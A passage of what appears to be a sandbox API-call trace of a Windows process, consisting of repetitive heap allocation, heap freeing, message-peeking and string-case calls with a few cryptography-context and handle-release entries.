RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.346] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0185.346] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.346] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0185.347] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.347] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0185.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.347] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.347] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.347] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.348] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0185.348] FreeLibrary (hLibModule=0x74f20000) returned 1 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.348] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0185.348] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0185.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0185.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0185.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.349] CloseHandle (hObject=0x138) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0185.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.350] CloseHandle (hObject=0x120) returned 1 [0185.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0185.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0185.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0185.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa9ffe0 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0185.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900038 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0185.361] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0185.362] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0185.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0185.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: 